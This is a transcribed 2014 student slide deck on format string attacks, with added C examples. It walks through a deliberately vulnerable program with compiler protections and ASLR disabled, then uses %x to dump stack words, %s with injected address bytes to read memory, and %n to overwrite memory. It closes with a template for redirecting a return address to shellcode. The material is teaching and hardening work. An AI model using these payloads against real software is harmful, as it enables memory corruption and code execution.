Format String Attacks (AJ, 2014.1.18)

[MOSUT] Format String Attacks


DESCRIPTION

A story about learning format string attacks and sharing what was learned. Outline:
  * Illustrating format string vulnerabilities
  * A case study
    + fsa.c
    + Compile and setup insecure environment
    + Viewing the stack
    + Viewing memory at any location
    + Overwriting of arbitrary memory
  * So, you can…


Page 1: [MOSUT] Format String Attacks

Format String Attacks
AJ
2014.1.18

Page 2

About Me

• Student at National Chung Cheng University
• Simulator for a 5-axis CNC machine tool
• CUDA programming for real-time collision detection
• 若渴計畫 & MOSUT

Page 3

Outline

• Illustrating format string vulnerabilities
• A case study
  • fsa.c
  • Compile and setup insecure environment
  • Viewing the stack
  • Viewing memory at any location
  • Overwriting of arbitrary memory
• So, you can…

Page 4

Format String Vulnerabilities

• The format string comes from argv[1] (user-controlled input)
• printf(argv[1])
• strcpy(buff, argv[1])
• snprintf(buf, sizeof buf, argv[1]);
• …
• Example: compile & execute (screenshot not reproduced in this transcript)
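Added example, not code from the slides or from fsa.c (which the deck does not reproduce): the vulnerable snprintf(buf, sizeof buf, argv[1]) pattern from this slide next to its hardened form, snprintf(buf, sizeof buf, "%s", argv[1]), plus a small scanner a reviewer can run over user-supplied text to find conversion directives that would consume stack arguments or, with %n, write memory. The sample inputs are constructed; only argument-free input ("%%") is sent through the vulnerable path so the demo program stays well-defined C. The function names and the scanner are this example's own, not an API of any library.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the slides. Contrasts the vulnerable call
 * pattern shown on this slide with its hardened form, and adds a scanner a
 * reviewer can use to spot directives in user-supplied text. */

/* VULNERABLE: user text is used as the format string. Every '%' directive in
 * it is interpreted; directives that take arguments read stack words that were
 * never passed (undefined behaviour), and %n writes memory. The demo below only
 * feeds it argument-free input so the program itself stays well-defined.
 * The pragma silences exactly the warning -Wformat-security gives for this
 * bug (slide 6 disables it with -Wno-format-security); it is here only so the
 * demo compiles under -Werror. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int format_vulnerable(char *buf, size_t n, const char *user)
{
    return snprintf(buf, n, user);
}
#pragma GCC diagnostic pop

/* HARDENED: user text is passed as an argument to a literal "%s" format, so a
 * '%' in it is copied as data and never interpreted. */
int format_hardened(char *buf, size_t n, const char *user)
{
    return snprintf(buf, n, "%s", user);
}

/* Counts the conversion directives in s that would consume an argument.
 * "%%" is a literal percent sign and is not counted. Flags, width, precision
 * and length modifiers are skipped so that "%4x" and "%08x" count once each
 * (the later slides vary the width this way). *writes_memory is set when a %n
 * directive is present, the case that turns a stack read into a memory write. */
int count_directives(const char *s, int *writes_memory)
{
    int n = 0;
    *writes_memory = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')              /* "%%": escaped percent, not a directive */
            continue;
        /* skip flags, width, precision and length modifiers */
        while (*p != '\0' && strchr("-+ #0123456789.*hlLqjzt", *p) != NULL)
            p++;
        if (*p == '\0')             /* trailing '%' with no conversion character */
            break;
        if (*p == 'n')
            *writes_memory = 1;
        n++;
    }
    return n;
}

/* Input-validation helper: non-zero if the text contains no argument-consuming
 * directive, i.e. it is harmless even if it were (wrongly) used as a format. */
int format_is_safe_as_data_only(const char *s)
{
    int writes;
    return count_directives(s, &writes) == 0;
}

int main(int argc, char **argv)
{
    /* constructed sample input; argv[1] is used when given, as on the slide */
    const char *user = argc > 1 ? argv[1] : "100%% done";
    char buf[100];
    int writes;

    printf("directives: %d, contains %%n: %d\n", count_directives(user, &writes), writes);
    format_hardened(buf, sizeof buf, user);
    printf("hardened  : %s\n", buf);
    if (format_is_safe_as_data_only(user)) {
        format_vulnerable(buf, sizeof buf, user);
        printf("vulnerable: %s  (run only because the input has no directives)\n", buf);
    }
    return 0;
}
```

Run without arguments it shows the one visible difference for argument-free input: the vulnerable path turns "%%" into a single "%", the hardened path copies the text unchanged. Passing the slide's "%x.%x.%x.%x.%n" as argv[1] makes the scanner report five directives including %n, and the vulnerable call is skipped.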

Page 5

A Case Study: fsa.c

Page 6

A Case Study: Compile and Setup Insecure Environment

• Compile
  • gcc -g -Wno-format-security -fno-stack-protector fsa.c
• Disable ASLR (address space layout randomization)
  • sudo sysctl -w kernel.randomize_va_space=0
• x86 machine & Ubuntu 12.04

Page 7

Stack Status before Executing snprintf()

[Stack diagram, not reproduced; from esp upward it shows three unknown words (??), then x = 97 = 'a', then buf[100].]

Page 8

Viewing the Stack: "%x.%x.%x.%x.%x"

• Format string = %x.%x.%x.%x.%x
• snprintf(buf, sizeof buf, argv[1]) => snprintf(buf, sizeof buf, "%x.%x.%x.%x.%x")

[Stack diagram, not reproduced; from esp upward: the three snprintf arguments (buffer pointer, buffer length, argv[1] pointer), then ?? = b7ff3fec, ?? = bfffff3b4, ?? = 0, x = 97 = 'a', buf[100]. The format string "%x.%x.%x.%x.%x" itself is drawn in the heap region.]

• Richard Reese, 透視 C 語言指標 (Chinese edition of Understanding and Using C Pointers), p.128
• C calling convention: http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html

Page 9

Viewing the Stack: "%x.%x.%x.%x.%x" (continued)

[Same diagram as Page 8 with the "fetch" step drawn: each of the five %x directives fetches the next 4-byte word from the stack above the snprintf arguments, i.e. the three ?? words, x, and the first word of buf[100].]

Page 10

Viewing the Stack: "%x.%x.%x.%x.%x" (continued)

[Same diagram with the "copy" step drawn: each fetched value is copied into buf.]

buf[100] = b7ff3fec.bfffff3b4.0.61.66663762 (ff7b)

• The execution order of "copy" and "fetch" is interleaved by the OS/libc: the fifth %x reads the first word of buf after "b7ff" has already been copied into it (0x66663762 is the bytes 'b','7','f','f' read as a little-endian word).

Page 11

Viewing the Stack: "aaaa.%x.%x.%x.%x.%x"

• Format string = aaaa.%x.%x.%x.%x.%x
• 'a' is 0x61 in ASCII
• snprintf(buf, sizeof buf, "aaaa.%x.%x.%x.%x.%x")

buf[100] = aaaa.b7ff3fec.bffff3a4.0.61.61616161

[Same stack diagram: the fifth %x fetches the first word of buf[100], which already holds "aaaa" = 0x61616161.]

Page 12

Viewing Memory at Any Location

• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%x
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%s

[Diagram, not reproduced: the four address bytes are copied to buf[0..3] as the word bffff2f8; the fifth directive fetches that word as its argument, so with %s the bytes at bffff2f8 (where the diagram places x = 97 = 'a') are read and printed.]

Page 13

Overwriting of Arbitrary Memory

• The %n field was encountered in the format string
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%n

[Diagram, not reproduced: with %s the word bffff2f8 at buf[0] is used as an address to read; with %n it is used as an address to write. After the call, x = 28 = 0x1c, the number of bytes output before %n was reached. Slide annotation: "26 (??) alignment".]

Page 14

So, You Can…

• Format string vulnerabilities
• Viewing the stack
• Finding return addresses
• Overwriting return address
• Overwriting return addresses to point to shellcode
• EX:
  $ ./a.out $(printf "return address").%x.%x.%x.%x.%n    => return address = 28
  $ ./a.out $(printf "return address").%x.%x.%x.%4x.%n   => return address = 30
  $ ./a.out $(printf "return address").%x.%x.%x.%8x.%n   => return address = 34
  $ ./a.out $(printf "return address").%Xx.%Yx.%Zx.%Ax.%n => return address = shellcode address
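Added example, not from the slides: the three byte counts this slide reports for %n (28, 30 and 34) reproduced with a literal format string and arguments the program supplies itself, so the code is well-defined C rather than a vulnerable call. The stack words are the values the earlier slides show (b7ff3fec, bffff3a4 as printed on Page 11, 0, 61), passed as constants, and "AAAA" stands in for the four raw address bytes; the function name is this example's own. The point for a defender: the value %n stores is nothing more than the output length so far, which the field width of an earlier directive shifts at will, so a single %n reachable from user input is a write of a chosen value to a chosen address. In a normal build this path is closed twice: gcc's -Wformat-security flags the non-literal format at compile time, and glibc's fortified printf family (-D_FORTIFY_SOURCE=2, which Ubuntu enables by default for optimised builds) aborts with "%n in writable segment detected" when %n appears in a format string that lives in writable memory; slide 6 switches both off on purpose.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the slides. Reproduces the slide's %n byte
 * counts with a literal format and arguments the program supplies itself. */

/* Emulates the slide's "<addr>.%x.%x.%x.%Wx.%n" output. Writes the formatted
 * text to out and returns what %n stored: the number of bytes produced before
 * the %n directive was reached. width is the minimum field width of the
 * fourth %x, i.e. 0 for "%x", 4 for "%4x", 8 for "%8x" on the slide; it is
 * passed through "%*x" so the format stays a literal. The stack words are the
 * constants shown on the earlier slides; "AAAA" stands in for the four address
 * bytes the slide injects with printf "\xf8\xf2\xff\xbf". Because the format
 * is a read-only literal and the %n target is our own variable, this is
 * legitimate C; the bug on the slide is that the attacker chooses all of it. */
int bytes_stored_by_n(int width, char *out, size_t outsz)
{
    int count = -1;   /* %n writes here; -1 would mean "never reached" */

    snprintf(out, outsz, "%s.%x.%x.%x.%*x.%n",
             "AAAA", 0xb7ff3fecu, 0xbffff3a4u, 0u, width, 0x61u, &count);
    return count;
}

int main(void)
{
    static const int widths[] = {0, 4, 8};   /* "%x", "%4x", "%8x" on the slide */
    char line[100];

    for (size_t i = 0; i < sizeof widths / sizeof widths[0]; i++) {
        int stored = bytes_stored_by_n(widths[i], line, sizeof line);
        /* stored always equals strlen(line) here because %n is the last directive */
        printf("width %d: %%n stored %d, strlen %zu, buf=\"%s\"\n",
               widths[i], stored, strlen(line), line);
    }
    return 0;
}
```

Widths 0, 4 and 8 give 28, 30 and 34, matching the slide; the padding spaces in front of "61" are the only thing that changed between the three runs, which is why the written value is attacker-tunable without touching the address part of the input.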

Page 15

You can overwrite arbitrary memory if there is a format string vulnerability.

Page 16

Reference

• Tim Newsham, "Format String Attacks", http://www.thenewsh.com/~newsham/format-string-attacks.pdf
• Stack Overflow, "How can a Format-String vulnerability be exploited?", http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerability-be-exploited
• Paul Haas, "Advanced Format String Attacks", http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18-Haas-Adv-Format-String-Attacks.pdf
• David Brumley, course slides, http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf
• scut et al., "Exploiting Format String Vulnerabilities", http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf